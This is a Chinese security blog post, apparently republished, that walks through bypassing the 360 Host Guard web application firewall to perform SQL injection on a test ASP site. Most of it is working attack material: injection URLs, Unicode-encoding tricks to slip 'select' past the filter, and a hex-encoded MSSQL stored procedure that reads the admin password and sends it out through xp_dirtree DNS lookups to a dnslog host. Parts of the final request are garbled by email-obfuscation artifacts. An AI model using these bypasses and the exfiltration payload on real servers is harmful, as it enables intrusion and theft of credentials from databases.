?

Jun 29 2017

bypass最新版360主機衛士繼續注入

首頁 » 滲透測試 » bypass最新版360主機衛士繼續注入   

序言

  主機衛士是360旗下的服務器安全軟件,為站長免費提供網站后門檢測、木馬查殺,網站補丁、漏洞防護等服務。這么多年因為主機衛士的存在,讓我們站長一直免于被黑客攻擊。不過任何一款軟件都會有不足的地方,今天
  測試流程

  1 我們先直接加上單引號試試:
  1. http://192.168.0.20/conn.asp?id=1%27
復制代碼
   
bypass最新版360主機衛士繼續注入-1-存儲架構-360主機衛士,主機衛士
   2 那我們繼續測試,and 1=1 和and 1=2,被攔截了。這個時候,我們可以看看到底是什么規則,發現每一個單獨提交都不被攔截,組合到一起便被攔截了,好,那我們變通一下,用+代替空格
   
bypass最新版360主機衛士繼續注入-2-存儲架構-360主機衛士,主機衛士
   3 查看數據庫版本
   
bypass最新版360主機衛士繼續注入-3-存儲架構-360主機衛士,主機衛士
   4 查看數據庫用戶
   
bypass最新版360主機衛士繼續注入-4-存儲架構-360主機衛士,主機衛士
   5 查看當前數據庫名稱
   
bypass最新版360主機衛士繼續注入-5-存儲架構-360主機衛士,主機衛士
   6 查看數據庫有多少數據庫名稱
  
  1. http://192.168.0.20/conn.asp?id=1+and+(SELECT+top+1+Name+FROM+Master..SysDatabases)
復制代碼
  
bypass最新版360主機衛士繼續注入-6-存儲架構-360主機衛士,主機衛士

     7 我們從左至右,開始依次加sql注入的關鍵字,發現
   
bypass最新版360主機衛士繼續注入-7-存儲架構-360主機衛士,主機衛士
   8 主機衛士攔截表
   
bypass最新版360主機衛士繼續注入-8-存儲架構-360主機衛士,主機衛士
  
  9 尋求突破
  從上面的攔截表格可以看出,兩個關鍵字的時候,只攔截select,那么我們試試三個關鍵字(無select)的時候,主機衛士會攔截什么?發現什么都不攔截,只會報語法錯誤。由此,我們得出一個結論,主機衛士一定會攔截select關鍵字,那么問題來了,他只攔截select嗎?SeLeCt呢?經過不完全測試,發現當我們將select字符unicode編碼后,不攔截
  1. http://192.168.0.20/conn.asp?id=1+and+%u0073%u0065%u006c%u0065%u0063%u0074
復制代碼
  
bypass最新版360主機衛士繼續注入-9-存儲架構-360主機衛士,主機衛士

  但是,當我們嘗試一次添加三個關鍵字的時候,主機衛士又攔截了(好累)。
  1. http://192.168.0.20/conn.asp?id=1+and+(%u0073%u0065%u006c%u0065%u0063%u0074+top
復制代碼
  
bypass最新版360主機衛士繼續注入-10-存儲架構-360主機衛士,主機衛士

  10 利用存儲過程
  mssql的存儲過程定義為:
  1. Declare @s varchar(5000)  //申明變量@s 類型為varchar(5000)
  2. Set @  //給@s變量賦值
  3. Exec(@s) //執行@s
復制代碼
那么,我們就需要試著在url中提交declare、set和exec,看看是否被攔截。
   
bypass最新版360主機衛士繼續注入-11-存儲架構-360主機衛士,主機衛士

  很好,沒有被攔截,只是提示語法錯誤,那就證明我們可以利用存儲過程去繞過主機衛士!我寫了一個存儲過程,內容如下(紅色字體是需要另外修改的):
  1. declare @s varchar(5000),@host varchar(5000)
  2. set @s=(select password from waf_test.dbo.admin where username='admin')
  3. [email protected]=CONVERT(varchar(5000),@s)+'.xxxx.ceye.io';EXEC('master..xp_dirtree"\\'[email protected]+'\foobar$"')
復制代碼
將這個存儲過程轉換成十六進制如下:
  1. 0x6465636c61726520407320766172636861722835303030292c40686f73742076617263686172283530303029207365742040733d2873656c6563742070617373776f72642066726f6d207761665f746573742e64626f2e61646d696e20776865726520757365726e616d653d2761646d696e2729207365742040686f73743d434f4e5645525428766172636861722835303030292c4073292b272e787878782e636579652e696f273b4558454328276d61737465722e2e78705f6469727472656520225c5c272b40686f73742b275c666f6f62617224222729
復制代碼
最終我們的請求為:
  1. http://192.168.0.124/conn.asp?id=1;[email protected]+varchar(5000)[email protected]=0x6465636c61726520407320766172636861722835303030292c40686f73742076617263686172283530303029207365742040733d2873656c6563742070617373776f72642066726f6d207761665f746573742e64626f2e61646d696e20776865726520757365726e616d653d2761646d696e2729207365742040686f73743d434f4e5645525428766172636861722835303030292c4073292b272e787878782e636579652e696f273b4558454328276d61737465722e2e78705f6469727472656520225c5c272b40686f73742b275c666f6f62617224222729+exec(@h)
復制代碼
    登陸dnslog,可以看到接收到了123456的子域名請求,這里的123456便是我在mssql數據庫中admin賬戶的密碼。具體看下圖:
   
bypass最新版360主機衛士繼續注入-12-存儲架構-360主機衛士,主機衛士
  
  總結

  攻防是對立的,有攻才有防。所以想更好的防御要換位思考從黑客的角度來看攻擊然后形成防御思維。在攻防研究中學習,在攻防實驗中進步。讓我們一起去迎接更好的每一天。
     喜歡我們就請長按下面的圖片關注我們吧。
   
bypass最新版360主機衛士繼續注入-13-存儲架構-360主機衛士,主機衛士
  

by Sec-News http://wiki.ioin.in/url/3vOP

如果您喜歡本博客,歡迎點擊圖片定訂閱到郵箱填寫您的郵件地址,訂閱我們的精彩內容:

正文部分到此結束

文章標簽:這篇文章木有標簽

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «高級SQL注入:混淆和繞過 | 最近更新的過WAF(防火墻教程)»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖